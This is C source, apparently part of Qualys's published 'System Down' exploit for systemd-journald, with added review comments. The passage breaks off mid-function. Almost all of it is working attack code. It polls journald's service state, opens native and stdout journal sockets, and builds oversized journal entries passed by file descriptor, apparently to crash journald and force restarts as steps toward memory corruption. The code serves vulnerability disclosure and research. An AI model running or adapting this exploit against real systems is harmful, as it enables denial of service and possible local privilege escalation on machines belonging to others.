/*
 * System Down: A systemd-journald exploit
 * https://www.qualys.com/2019/01/09/system-down/system-down.txt
 * Copyright (C) 2019 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

#define _GNU_SOURCE
#include <asm/types.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <limits.h>
#include <linux/inet_diag.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/sock_diag.h>
#include <linux/unix_diag.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/statvfs.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/un.h>
#include <time.h>
#include <unistd.h>

#include "journald.h"
#include "macro.h"
#include "target.h"
#include "time-util.h"
#include "wall.h"

/*
 * Query systemd for the state of systemd-journald.service.
 *
 * Runs `systemctl show systemd-journald.service` through popen() and parses
 * its "Name=Value" output line by line, keeping only the properties used by
 * this file. A malformed line or value, or a Restart= setting other than
 * "always", ends in die() (defined elsewhere).
 *
 * Returns a journald_t in which:
 *   - MainPID is forced to 0 unless the unit reported ActiveState=active,
 *     SubState=running and StatusText="Processing requests...";
 *   - LimitSTACKSoft falls back to _STK_LIM when not positive, and any
 *     other value is rejected;
 *   - StartLimitBurst falls back to 5 when not positive;
 *   - StartLimitInterval falls back to 10 * USEC_PER_SEC when not positive;
 *   - WatchdogUSec is clamped to the range [1 minute, 1 hour].
 */
journald_t
show_journald(void)
{
    journald_t journald = { 0 };
    /* Unit state flags; all three must be set for MainPID to be kept. */
    struct { bool active, running, processing; } state = { 0 };
    FILE * const fp = popen("systemctl show systemd-journald.service 2>/dev/null", "re");
    if (!fp) die();

    static char buf[65536];
    while (fgets(buf, sizeof(buf), fp) == buf) {
        /* A line without a newline (too long for buf, or unterminated) is fatal. */
        char * const nl = strchr(buf, '\n');
        if (!nl) die();
        *nl = '\0';

        /* Split "Name=Value" in place at the first '='. */
        char * const eq = strchr(buf, '=');
        if (!eq) die();
        *eq = '\0';
        const char * const var = buf;
        const char * const val = eq + 1;

        /*
         * Parse `val` as a complete base-10 unsigned integer (GNU statement
         * expression); die() on overflow, empty input or trailing characters.
         */
        #define UMAX_OR_DIE() ({ \
            errno = 0; \
            char * end = NULL; \
            const uintmax_t umax = strtoumax(val, &end, 10); \
            const bool valid_umax = (!errno && end > val && !*end); \
            if (!valid_umax) die(); \
            umax; \
        })

        /*
         * Parse `val` as a time span via parse_sec() (declared elsewhere);
         * only accepted when the property name contains "USec" and
         * parse_sec() returns 0.
         */
        #define USEC_OR_DIE() ({ \
            usec_t usec = 0; \
            const bool valid_usec = (strstr(var, "USec") && !parse_sec(val, &usec)); \
            if (!valid_usec) die(); \
            usec; \
        })

        if (!strcmp(var, "MainPID")) {
            journald.MainPID = UMAX_OR_DIE();
            /* No main PID reported: stop parsing, later properties are not read. */
            if (journald.MainPID <= 0) break;

        } else if (!strcmp(var, "LimitSTACKSoft")) {
            journald.LimitSTACKSoft = UMAX_OR_DIE();

        } else if (!strcmp(var, "StartLimitBurst")) {
            journald.StartLimitBurst = UMAX_OR_DIE();

        /* The interval is accepted under three property names; the first two
         * are read as plain integers, the third as a time span. */
        } else if (!strcmp(var, "StartLimitInterval") ||
                   !strcmp(var, "StartLimitIntervalSec")) {
            journald.StartLimitInterval = UMAX_OR_DIE();

        } else if (!strcmp(var, "StartLimitIntervalUSec")) {
            journald.StartLimitInterval = USEC_OR_DIE();

        } else if (!strcmp(var, "WatchdogUSec")) {
            journald.WatchdogUSec = USEC_OR_DIE();

        } else if (!strcmp(var, "ActiveState")) {
            state.active = !strcmp(val, "active");

        } else if (!strcmp(var, "SubState")) {
            state.running = !strcmp(val, "running");

        } else if (!strcmp(var, "StatusText")) {
            state.processing = !strcmp(val, "Processing requests...");

        } else if (!strcmp(var, "Restart")) {
            /* Callers in this file wait for a new MainPID; require Restart=always. */
            if (strcmp(val, "always")) die();
        }
    }
    if (pclose(fp) == -1) die();

    /* Report "no PID" unless the service is fully up and processing. */
    if (!state.active || !state.running || !state.processing)
        journald.MainPID = 0;
    if (journald.MainPID >= PID_MAX_LIMIT) die();

    /* Only the default stack limit (_STK_LIM) is accepted. */
    if (journald.LimitSTACKSoft <= 0)
        journald.LimitSTACKSoft = _STK_LIM;
    if (journald.LimitSTACKSoft != _STK_LIM) die();

    if (journald.StartLimitBurst <= 0)
        journald.StartLimitBurst = 5;

    if (journald.StartLimitInterval <= 0)
        journald.StartLimitInterval = 10 * USEC_PER_SEC;
    if (journald.StartLimitInterval >= USEC_INFINITY) die();

    /* Clamp the watchdog timeout to [1 minute, 1 hour]. */
    if (journald.WatchdogUSec < 1 * USEC_PER_MINUTE)
        journald.WatchdogUSec = 1 * USEC_PER_MINUTE;
    if (journald.WatchdogUSec > 1 * USEC_PER_HOUR)
        journald.WatchdogUSec = 1 * USEC_PER_HOUR;

    return journald;
}

/*
 * Return the service's soft stack limit as reported by show_journald().
 *
 * The first successful query is cached in a function-local static, so later
 * calls do not run systemctl again. die() if the service has no main PID or
 * the limit is zero or does not fit below SIZE_MAX.
 */
size_t
journald_LimitSTACKSoft(void)
{
    static journald_t cached;

    if (cached.MainPID > 0)
        return cached.LimitSTACKSoft;

    cached = show_journald();
    if (cached.MainPID <= 0 ||
        cached.LimitSTACKSoft <= 0 ||
        cached.LimitSTACKSoft >= SIZE_MAX) {
        die();
    }
    return cached.LimitSTACKSoft;
}

/*
 * Return the service's watchdog timeout as reported by show_journald().
 *
 * The first successful query is cached in a function-local static, so later
 * calls do not run systemctl again. die() if the service has no main PID or
 * the timeout is zero or not below USEC_INFINITY.
 */
usec_t
journald_WatchdogUSec(void)
{
    static journald_t cached;

    if (cached.MainPID > 0)
        return cached.WatchdogUSec;

    cached = show_journald();
    if (cached.MainPID <= 0 ||
        cached.WatchdogUSec <= 0 ||
        cached.WatchdogUSec >= USEC_INFINITY) {
        die();
    }
    return cached.WatchdogUSec;
}

/*
 * Build the syslog priority value used for messages sent by this file:
 * facility LOG_USER, severity LOG_EMERG when use_wall() is true and
 * LOG_DEBUG otherwise.
 */
unsigned
make_syslog_priority(void)
{
    const int severity = use_wall() ? LOG_EMERG : LOG_DEBUG;
    return LOG_MAKEPRI(LOG_USER, severity);
}

/*
 * Fill buf with a random identifier of exactly size - 1 characters plus a
 * terminating NUL: a leading '_' followed by characters drawn with random()
 * from [A-Za-z0-9].
 *
 * buf must be non-NULL and size must be at least 2, otherwise die().
 */
void
generate_syslog_identifier(char * const buf, const size_t size)
{
    static const char charset[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    const size_t charset_len = sizeof(charset) - 1;

    if (!buf || size <= 1) die();

    /* Index of the terminating NUL. */
    const size_t last = size - 1;

    size_t pos = 0;
    buf[pos++] = '_';
    while (pos < last) {
        const size_t pick = (size_t)random() % charset_len;
        buf[pos++] = charset[pick];
    }
    if (pos != last) die();
    buf[last] = '\0';
}

/*
 * Wait until a journal entry tagged with `identifier` can be read back, and
 * copy the raw `journalctl` output for it into buf.
 *
 * When use_wall() is true the call is delegated to read_from_wall().
 * Otherwise `journalctl --lines=1 --identifier=<identifier>` is run
 * repeatedly (with a 10 ms pause before each attempt) until its output
 * contains the identifier.
 *
 * identifier: non-empty string; it is pasted unquoted into a shell command.
 * buf, size:  destination buffer, size >= 2. The output must be strictly
 *             smaller than the buffer, otherwise die(). No NUL terminator
 *             is written by this function.
 *
 * Returns the number of bytes stored in buf. If the TIMED_WHILE loop
 * (macro defined elsewhere; presumably time-limited) ends without a match,
 * the function die()s.
 *
 * State kept across calls (function-local statics): which journal to query
 * (--user first, then --system), which journals reported a permission
 * error, and whether a match has been seen yet.
 */
size_t
read_from_journal(const char * const identifier, char * const buf, const size_t size)
{
    if (use_wall()) return read_from_wall(identifier, buf, size);

    if (!buf) die();
    if (size <= 1) die();
    if (!identifier) die();
    const size_t identifier_len = strlen(identifier);
    if (identifier_len <= 0) die();

    /* Local bit values used both to select the journal and as a bitmask in permission_denied. */
    enum {
        SD_JOURNAL_SYSTEM = 4,
        SD_JOURNAL_USER = 8,
    };
    static int journal_type = SD_JOURNAL_USER;
    static int permission_denied = 0;
    static bool first_call = true;

    TIMED_WHILE (true) {
        usleep(10 * USEC_PER_MSEC);
        size_t len = 0;
      {
        /*
         * Until the first match, stderr is merged into stdout so that the
         * permission error below can be detected; afterwards it is discarded.
         */
        static char command[256];
        xsnprintf(command, sizeof(command), "journalctl %s --lines=1 --identifier=%s --all --quiet %s",
            (journal_type & SD_JOURNAL_USER) ? "--user" : "--system", identifier,
            first_call ? "2>&1" : "2>/dev/null");

        FILE * const fp = popen(command, "re");
        if (!fp) die();
        /* Read the whole output; a short read must be a clean EOF. */
        for (;;) {
            const size_t nbr = fread(buf + len, 1, size - len, fp);
            if (nbr <= 0) {
                if (!feof(fp)) die();
                if (ferror(fp)) die();
                break;
            }
            /* Filling the buffer completely is treated as truncation. */
            if (nbr >= size - len) die();
            len += nbr;
        }
        if (pclose(fp) == -1) die();
      }

        /* Success: the output mentions our identifier. */
        if (memmem(buf, len, identifier, identifier_len)) {
            if (first_call) printf("journal_type %d\n", journal_type);
            first_call = false;
            return len;
        }

        /*
         * No match yet and no journal type has worked so far: remember
         * permission errors and alternate between --user and --system.
         * Once a match has been seen, journal_type stays fixed.
         */
        if (first_call) {
            #define NO_JOURNAL_FILES_OPENED "No journal files were opened due to insufficient permissions."
            if (memmem(buf, len, NO_JOURNAL_FILES_OPENED, sizeof(NO_JOURNAL_FILES_OPENED)-1)) {
                permission_denied |= journal_type;
                /* Both journals are unreadable: report and give up. */
                if ((permission_denied & SD_JOURNAL_USER) &&
                    (permission_denied & SD_JOURNAL_SYSTEM)) {
                    puts(NO_JOURNAL_FILES_OPENED);
                    die();
                }
            }
            if (journal_type & SD_JOURNAL_USER) {
                journal_type = SD_JOURNAL_SYSTEM;
            } else {
                journal_type = SD_JOURNAL_USER;
            }
        }
    }
    die();
}

/*
 * Request the largest possible send and receive buffers on socket_fd.
 *
 * For SO_SNDBUF and SO_RCVBUF in turn: ask for INT_MAX, read the value back,
 * and die() unless the effective size is larger than
 * DEFAULT_MMAP_THRESHOLD_MIN (defined elsewhere).
 */
static void
set_socket_options(const int socket_fd)
{
    static const int buffer_opts[] = { SO_SNDBUF, SO_RCVBUF };
    const int * const end = buffer_opts + ELEMENTSOF(buffer_opts);
    const int *opt;

    for (opt = buffer_opts; opt < end; opt++) {
        int requested = INT_MAX;
        if (setsockopt(socket_fd, SOL_SOCKET, *opt, &requested, sizeof(requested)) != 0) die();

        int granted = 0;
        socklen_t granted_len = sizeof(granted);
        if (getsockopt(socket_fd, SOL_SOCKET, *opt, &granted, &granted_len) != 0) die();
        if (granted_len != sizeof(granted)) die();
        if (granted <= DEFAULT_MMAP_THRESHOLD_MIN) die();
    }
}

/*
 * Open a close-on-exec AF_UNIX datagram socket connected to the syslog
 * socket path returned by target_dev_log() (defined elsewhere), with
 * enlarged buffers (see set_socket_options()).
 *
 * Returns the connected descriptor; the caller closes it. Any failure
 * ends in die().
 */
int
open_syslog_connection(void)
{
    const int fd = socket(AF_UNIX, SOCK_DGRAM | SOCK_CLOEXEC, 0);
    if (fd < 0) die();

    struct sockaddr_un addr = { .sun_family = AF_UNIX };
    xsnprintf(addr.sun_path, sizeof(addr.sun_path), "%s", target_dev_log());

    const int rc = connect(fd, (const struct sockaddr *)&addr, sizeof(addr));
    if (rc != 0) die();

    set_socket_options(fd);
    return fd;
}

/*
 * Round-trip check of the logging path: send one syslog message carrying a
 * fresh random identifier, then wait (via read_from_journal()) until that
 * identifier can be read back. die() on any failure.
 */
void
ping_syslog_server(void)
{
    static char scratch[65536];
    static char tag[11 + 1];

    generate_syslog_identifier(tag, sizeof(tag));

    /* Send "<priority>tag: a" over a short-lived syslog connection. */
    const unsigned priority = make_syslog_priority();
    const unsigned msg_len = xsnprintf(scratch, sizeof(scratch), "<%u>%s: a", priority, tag);
    const int fd = open_syslog_connection();
    xwrite(fd, scratch, msg_len);
    if (close(fd) != 0) die();

    /* Reuse the same buffer for the text read back from the journal. */
    const size_t got = read_from_journal(tag, scratch, sizeof(scratch));
    if (memmem(scratch, got, tag, strlen(tag)) == NULL) die();
}

/*
 * Open a close-on-exec AF_UNIX datagram socket connected to
 * /run/systemd/journal/socket, with enlarged buffers (see
 * set_socket_options()).
 *
 * Returns the connected descriptor; the caller closes it. Any failure
 * ends in die().
 */
int
open_native_connection(void)
{
    static const struct sockaddr_un journal_addr = {
        .sun_family = AF_UNIX,
        .sun_path = "/run/systemd/journal/socket",
    };

    const int fd = socket(AF_UNIX, SOCK_DGRAM | SOCK_CLOEXEC, 0);
    if (fd < 0) die();

    const int rc = connect(fd, (const struct sockaddr *)&journal_addr, sizeof(journal_addr));
    if (rc != 0) die();

    set_socket_options(fd);
    return fd;
}

/*
 * Flags for memfd_create(2) (unsigned int).
 * Fallback definitions for builds whose headers do not define MFD_CLOEXEC;
 * note that this single guard covers all three macros.
 */
#ifndef MFD_CLOEXEC
#define MFD_CLOEXEC             0x0001U
#define MFD_ALLOW_SEALING       0x0002U
#define MFD_HUGETLB             0x0004U
#endif

tempfile_t
open_native_tempfile(const bool try_memfd, const size_t estimated_size)
{
    if (try_memfd && !target_deny_memfd()) {
        const long fd = syscall(SYS_memfd_create, "tempfile", MFD_ALLOW_SEALING | MFD_CLOEXEC);
        if (fd != -1) {
            if (fd <= -1) die();
            if (fd >= INT_MAX) die();
            const tempfile_t tempfile = { .fd = fd, .is_memfd = true };
            return tempfile;
        }
    }

    static const char * const directories[] = { "/var/tmp/", "/tmp/", "/dev/shm/" };
    size_t i;
    for (i = 0; i < ELEMENTSOF(directories); i++) {
        const char * const directory = directories[i];

        struct statvfs fs;
        if (statvfs(directory, &fs)) continue;
        if (fs.f_bsize <= 0) continue;
        if (estimated_size / fs.f_bsize >= fs.f_bavail) continue;

        static char filename[PATH_MAX];
        xsnprintf(filename, sizeof(filename), "%s/tempfile.XXXXXX", directory);

        const int fd = mkostemp(filename, O_CLOEXEC);
        if (fd <= -1) continue;
        if (unlink(filename)) die();
        const tempfile_t tempfile = { .fd = fd, .is_memfd = false };
        return tempfile;
    }
    die();
}

/*
 * Return the current size in bytes of the regular file behind tempfile.fd.
 *
 * die() if the descriptor is invalid, fstat() fails, the file is not a
 * regular file, or its size is not in the open range (0, SSIZE_MAX).
 */
size_t
native_tempfile_size(const tempfile_t tempfile)
{
    struct stat info;

    if (tempfile.fd < 0) die();
    if (fstat(tempfile.fd, &info) != 0) die();
    if (!S_ISREG(info.st_mode)) die();

    /* An empty file is as unacceptable as an oversized one. */
    if (info.st_size <= 0 || info.st_size >= SSIZE_MAX) die();
    return info.st_size;
}

/*
 * Fallback definitions of the fcntl(2) file-sealing interface, used only
 * when the system headers do not already provide them.
 */
#ifndef F_LINUX_SPECIFIC_BASE
#define F_LINUX_SPECIFIC_BASE   1024
#endif

/*
 * Set/Get seals
 * (the F_ADD_SEALS guard covers both commands)
 */
#ifndef F_ADD_SEALS
#define F_ADD_SEALS     (F_LINUX_SPECIFIC_BASE + 9)
#define F_GET_SEALS     (F_LINUX_SPECIFIC_BASE + 10)
#endif

/*
 * Types of seals
 * (the F_SEAL_SEAL guard covers all four flags)
 */
#ifndef F_SEAL_SEAL
#define F_SEAL_SEAL     0x0001  /* prevent further seals from being set */
#define F_SEAL_SHRINK   0x0002  /* prevent file from shrinking */
#define F_SEAL_GROW     0x0004  /* prevent file from growing */
#define F_SEAL_WRITE    0x0008  /* prevent writes */
#endif

/*
 * Make a memfd-backed tempfile immutable by applying the SHRINK, GROW,
 * WRITE and SEAL seals. Does nothing for non-memfd files or when exactly
 * this seal set is already in place; die() if the seals cannot be applied
 * or do not read back as expected.
 */
static void
seal_native_tempfile(const tempfile_t tempfile)
{
    enum { ALL_SEALS = F_SEAL_SHRINK | F_SEAL_GROW | F_SEAL_WRITE | F_SEAL_SEAL };

    if (tempfile.fd < 0) die();

    if (tempfile.is_memfd) {
        const bool already_sealed = (fcntl(tempfile.fd, F_GET_SEALS) == ALL_SEALS);
        if (!already_sealed) {
            if (fcntl(tempfile.fd, F_ADD_SEALS, ALL_SEALS) != 0) die();
            if (fcntl(tempfile.fd, F_GET_SEALS) != ALL_SEALS) die();
        }
    }
}

/*
 * Pass tempfile.fd to the peer of native_fd as SCM_RIGHTS ancillary data.
 *
 * Before sending, the file offset is rewound to 0, the file size is checked
 * against ENTRY_SIZE_MAX (defined elsewhere) and, for memfds, the file is
 * sealed. The message itself carries no regular payload, so sendmsg() is
 * expected to return 0; anything else ends in die().
 *
 * native_fd: connected datagram socket (see open_native_connection()).
 * tempfile:  file to hand over; it stays open in this process.
 */
void
send_native_tempfile(const int native_fd, const tempfile_t tempfile)
{
    if (native_fd <= -1) die();
    if (tempfile.fd <= -1) die();

    if (lseek(tempfile.fd, 0, SEEK_SET) != 0) die();
    if (native_tempfile_size(tempfile) > ENTRY_SIZE_MAX) die();
    seal_native_tempfile(tempfile);

    /*
     * The union guarantees that the control buffer is suitably aligned for
     * struct cmsghdr, as recommended by cmsg(3); a bare char array is not.
     */
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } control;
    memset(&control, 0, sizeof(control));

    struct msghdr msg = { 0 };
    msg.msg_control = control.buf;
    msg.msg_controllen = sizeof(control.buf);

    struct cmsghdr * const cmsg = CMSG_FIRSTHDR(&msg);
    if (!cmsg) die();
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    if (msg.msg_controllen != CMSG_SPACE(sizeof(int))) die();

    /* CMSG_DATA() is not guaranteed to be int-aligned: copy, don't cast. */
    const int fd = tempfile.fd;
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));

    if (sendmsg(native_fd, &msg, 0) != 0) die();
}

/*
 * Send one sock_diag request over netlink_fd asking for the peer
 * (UDIAG_SHOW_PEER) of the AF_UNIX socket whose inode is unix_inode.
 *
 * The request is a netlink header immediately followed by a
 * struct unix_diag_req; the layout is verified against the NLMSG_* macros
 * at run time. die() on invalid arguments, unexpected layout or a short
 * send.
 */
static void
send_unix_peer_request(const int netlink_fd, const uint32_t unix_inode)
{
    if (netlink_fd < 0) die();
    if (unix_inode == 0) die();

    struct diag_query {
        struct nlmsghdr header;
        struct unix_diag_req body;
    };
    const struct diag_query query = {
        .header = {
            .nlmsg_len = sizeof(struct diag_query),
            .nlmsg_type = SOCK_DIAG_BY_FAMILY,
            .nlmsg_flags = NLM_F_REQUEST,
        },
        .body = {
            .sdiag_family = AF_UNIX,
            .udiag_ino = unix_inode,
            .udiag_cookie = { INET_DIAG_NOCOOKIE, INET_DIAG_NOCOOKIE },
            .udiag_show = UDIAG_SHOW_PEER,
        },
    };

    /* The struct must have exactly the size and offsets netlink expects. */
    const bool layout_ok =
        sizeof(query) == NLMSG_SPACE(sizeof(query.body)) &&
        sizeof(query) == NLMSG_LENGTH(sizeof(query.body)) &&
        offsetof(struct diag_query, body) == NLMSG_LENGTH(0);
    if (!layout_ok) die();

    /* Destination address with only the family set. */
    static const struct sockaddr_nl kernel_addr = {
        .nl_family = AF_NETLINK,
    };
    const struct iovec vec = {
        .iov_base = (void *)&query,
        .iov_len = sizeof(query),
    };
    const struct msghdr hdr = {
        .msg_name = (void *)&kernel_addr,
        .msg_namelen = sizeof(kernel_addr),
        .msg_iov = (void *)&vec,
        .msg_iovlen = 1,
    };

    const ssize_t sent = sendmsg(netlink_fd, &hdr, 0);
    if (sent != (ssize_t)sizeof(query)) die();
}

/*
 * Receive one datagram from netlink_fd and extract the UNIX_DIAG_PEER
 * attribute from the sock_diag reply it contains.
 *
 * Returns the peer's inode number, or 0 when the datagram holds no
 * SOCK_DIAG_BY_FAMILY message with a non-zero peer attribute (the caller
 * retries in that case). die() on receive errors, on any message flag set
 * by recvmsg() (e.g. truncation), and on malformed messages.
 */
static uint32_t
recv_unix_peer_response(const int netlink_fd)
{
    if (netlink_fd <= -1) die();

    static char buf[65536];
    static const struct iovec iov = {
        .iov_base = buf,
        .iov_len = sizeof(buf),
    };
    struct msghdr msg = {
        .msg_iov = (void *)&iov,
        .msg_iovlen = 1,
    };

    const ssize_t received = recvmsg(netlink_fd, &msg, 0);
    if (received <= 0) die();
    if (msg.msg_flags) die();
    size_t nbr = received;
    const struct nlmsghdr * nlh = (const void *)buf;

    /* Walk every netlink message in the datagram. */
    for (; NLMSG_OK(nlh, nbr); nlh = NLMSG_NEXT(nlh, nbr)) {
        if (nlh->nlmsg_type != SOCK_DIAG_BY_FAMILY) continue;

        /* A reply must carry at least one attribute after the fixed part. */
        const struct unix_diag_msg * const udm = NLMSG_DATA(nlh);
        if (nlh->nlmsg_len <= NLMSG_LENGTH(sizeof(*udm))) die();
        size_t len = nlh->nlmsg_len - NLMSG_LENGTH(sizeof(*udm));
        const struct rtattr * rta = (const void *)(udm + 1);

        for (; RTA_OK(rta, len); rta = RTA_NEXT(rta, len)) {
            if (rta->rta_type != UNIX_DIAG_PEER) continue;

            if (RTA_PAYLOAD(rta) != sizeof(uint32_t)) die();
            /* Copy the payload out instead of dereferencing a cast pointer. */
            uint32_t peer_inode = 0;
            memcpy(&peer_inode, RTA_DATA(rta), sizeof(peer_inode));
            if (peer_inode > 0) return peer_inode;
        }
    }
    return 0;
}

static peer_t
show_unix_peer(const int unix_fd)
{
    if (unix_fd <= -1) die();

    struct stat unix_st;
    if (fstat(unix_fd, &unix_st)) die();
    if (!S_ISSOCK(unix_st.st_mode)) die();
    if (unix_st.st_ino <= 0) die();
    if (unix_st.st_ino > UINT32_MAX) die();

    uint32_t peer_inode = 0;
  {
    const int netlink_fd = socket(AF_NETLINK, SOCK_DGRAM | SOCK_CLOEXEC, NETLINK_SOCK_DIAG);
    if (netlink_fd <= -1) die();

    TIMED_WHILE (true) {
        send_unix_peer_request(netlink_fd, unix_st.st_ino);
        peer_inode = recv_unix_peer_response(netlink_fd);
        if (peer_inode > 0) break;
        usleep(1 * USEC_PER_MSEC);
    }
    if (close(netlink_fd)) die();
  }
    const peer_t peer = {
        .dev = unix_st.st_dev,
        .ino = peer_inode,
    };
    return peer;
}

/*
 * Tell whether the state file "<dev>:<ino>" for the given stream currently
 * exists under /run/systemd/journal/streams.
 *
 * stream: must have a valid fd and a non-zero peer inode.
 *
 * Returns true if the file exists and is a regular file, false if lstat()
 * reports ENOENT. die() on any other error, if the path is not a regular
 * file, or if the streams directory itself is missing (checked once and
 * remembered in a function-local static).
 */
static bool
state_file_exists(const stream_t stream)
{
    if (stream.fd <= -1) die();
    const peer_t peer = stream.peer;
    if (peer.ino <= 0) die();

    struct stat st;
    static const char directory[] = "/run/systemd/journal/streams";
    static bool state_directory_exists = false;
    if (!state_directory_exists) {
        if (lstat(directory, &st)) die();
        if (!S_ISDIR(st.st_mode)) die();
        state_directory_exists = true;
    }

    /*
     * "%lu" requires unsigned long arguments. peer_t is declared elsewhere,
     * so cast explicitly to keep the call well-defined whatever the field
     * types are.
     */
    static char filename[PATH_MAX];
    xsnprintf(filename, sizeof(filename), "%s/%lu:%lu", directory,
        (unsigned long)peer.dev, (unsigned long)peer.ino);

    const int error = lstat(filename, &st);
    if (error) {
        if (error != -1) die();
        /* Only "does not exist" is an acceptable failure. */
        if (errno != ENOENT) die();
        return false;
    }
    if (!S_ISREG(st.st_mode)) die();
    return true;
}

/*
 * Open a stream connection to /run/systemd/journal/stdout and wait until
 * the corresponding state file shows up (see state_file_exists()).
 *
 * Up to two attempts are made. Each attempt connects, looks up the peer
 * socket, sends a header block and then polls for the state file while
 * sending single NUL bytes. If the connection is reset or the header
 * cannot be sent in full, the socket is closed and the next attempt
 * starts.
 *
 * Returns the stream (descriptor plus peer identity) once its state file
 * exists; the caller releases it with close_stdout_stream(). die() if both
 * attempts fail or on any unexpected error.
 */
stream_t
open_stdout_stream(void)
{
    unsigned i;
    for (i = 0; i < 2; i++) {
        const int fd = socket(AF_UNIX, SOCK_STREAM | SOCK_CLOEXEC, 0);
        if (fd <= -1) die();

        static const struct sockaddr_un sa = {
            .sun_family = AF_UNIX,
            .sun_path = "/run/systemd/journal/stdout",
        };
        if (connect(fd, (const struct sockaddr *)&sa, sizeof(sa))) die();

        const peer_t peer = show_unix_peer(fd);
        if (peer.ino <= 0) die();

        const stream_t stream = {
            .fd = fd,
            .peer = peer,
        };
        /* A fresh connection must not have a state file yet. */
        if (state_file_exists(stream)) die();

        /* 64-character building block, repeated to form a 1024-character string. */
        #define IDENTIFIER_64 "ABCDEFGHIJKLMNOPQRSTUVWXYZ-abcdefghijklmnopqrstuvwxyz.0123456789"
        #define IDENTIFIER_256 IDENTIFIER_64 IDENTIFIER_64 IDENTIFIER_64 IDENTIFIER_64
        #define IDENTIFIER_1024 IDENTIFIER_256 IDENTIFIER_256 IDENTIFIER_256 IDENTIFIER_256

        /*
         * Header block: a long first line followed by six short lines.
         * NOTE(review): presumably these are the header fields journald
         * expects on a new stdout stream - confirm against systemd's
         * journald-stream.c. A random prefix of 0..1023 characters is
         * skipped, so the length of the first line varies per call; the
         * string's terminating NUL is sent as well (sizeof includes it).
         */
        static const char save[] = IDENTIFIER_1024 "\n\n15\n0\n0\n0\n0\n";
        const size_t skip = (size_t)random() % 1024;
        if (skip >= sizeof(save)) die();
        if (send(fd, save + skip, sizeof(save) - skip, MSG_NOSIGNAL) !=
                        (ssize_t)(sizeof(save) - skip)) goto cleanup;

        TIMED_WHILE (true) {
            if (state_file_exists(stream)) return stream;
            /*
             * Keep feeding single NUL bytes without blocking. A reset or
             * closed connection triggers a retry; a full socket buffer
             * (EAGAIN/EWOULDBLOCK) is ignored.
             */
            if (send(fd, "\0", 1, MSG_NOSIGNAL | MSG_DONTWAIT) == -1) {
                if (errno == EPIPE || errno == ECONNRESET) goto cleanup;
                if (errno != EAGAIN && errno != EWOULDBLOCK) die();
            }
            usleep(1 * USEC_PER_MSEC);
        }
        /* Also reached when the TIMED_WHILE loop (defined elsewhere) ends. */
cleanup:
        if (close(fd)) die();
    }
    die();
}

/*
 * Close a stream obtained from open_stdout_stream() and wait until its
 * state file has disappeared.
 *
 * The state file must exist on entry. After close(), its presence is
 * polled every millisecond inside a TIMED_WHILE loop (macro defined
 * elsewhere); die() if the loop ends while the file is still there.
 */
void
close_stdout_stream(const stream_t stream)
{
    if (stream.fd < 0) die();

    const bool present_before = state_file_exists(stream);
    if (!present_before) die();

    if (close(stream.fd) != 0) die();

    TIMED_WHILE (true) {
        const bool still_present = state_file_exists(stream);
        if (!still_present) return;
        usleep(1 * USEC_PER_MSEC);
    }
    die();
}

/*
 * Sleep for StartLimitInterval / StartLimitBurst microseconds, using a
 * relative clock_nanosleep() on CLOCK_MONOTONIC.
 *
 * journald: state returned by show_journald(); MainPID and StartLimitBurst
 *           must be positive and the resulting pause must be shorter than
 *           one hour, otherwise die(). An interrupted or failed sleep also
 *           ends in die().
 */
static void
sleep_after_restart(const journald_t journald)
{
    if (journald.MainPID <= 0 || journald.StartLimitBurst <= 0) die();

    const uintmax_t pause_usec = journald.StartLimitInterval / journald.StartLimitBurst;
    if (pause_usec >= 1 * USEC_PER_HOUR) die();

    /* Split the microsecond count into whole seconds and nanoseconds. */
    const struct timespec delay = {
        .tv_sec  = pause_usec / USEC_PER_SEC,
        .tv_nsec = pause_usec % USEC_PER_SEC * NSEC_PER_USEC,
    };
    const int rc = clock_nanosleep(CLOCK_MONOTONIC, 0, &delay, NULL);
    if (rc != 0) die();
}

/*
 * Wait for (and, when needed, provoke) a change of the journald main PID.
 *
 * Sequence, as implemented below:
 *   1. Open and immediately close a stdout stream.
 *   2. Query the service state. On the very first call, or when the main
 *      PID is still the one recorded by the previous call, send a large
 *      native journal entry: a file holding
 *      journald_LimitSTACKSoft() / sizeof(EntryItem) copies of NATIVE_ITEM,
 *      passed by descriptor over the native socket. The file is built once
 *      and reused by later calls.
 *      NOTE(review): presumably this entry is what makes the service exit
 *      so that systemd restarts it - see the advisory referenced in the
 *      file header.
 *   3. Poll show_journald() every 10 ms until it reports a non-zero main
 *      PID different from the recorded one, record it, sleep (see
 *      sleep_after_restart()) and return.
 *
 * die() on any failure, including the end of the TIMED_WHILE loop (macro
 * defined elsewhere) without a PID change.
 */
void
restart_journald(void)
{
  {
    const stream_t stream = open_stdout_stream();
    close_stdout_stream(stream);
  }

    /* Main PID seen by the previous call; 0 until the first call has run. */
    static uintmax_t last_pid = 0;
  {
    const journald_t journald = show_journald();
    if (journald.MainPID <= 0) die();

    /* Skip sending if the PID already differs from the recorded one. */
    if (last_pid <= 0 || journald.MainPID == last_pid) {
        if (last_pid <= 0) {
            last_pid = journald.MainPID;
            sleep_after_restart(journald);
        }

        /* Built on first use and kept open for the lifetime of the process. */
        static tempfile_t tempfile = { .fd = -1 };
        if (tempfile.fd <= -1) {
            size_t iovec_n = journald_LimitSTACKSoft() / sizeof(EntryItem);
            tempfile = open_native_tempfile(true, iovec_n * NATIVE_ITEM_LEN);
            if (tempfile.fd <= -1) die();

            /* Pre-fill a 1 MiB buffer with as many whole items as fit. */
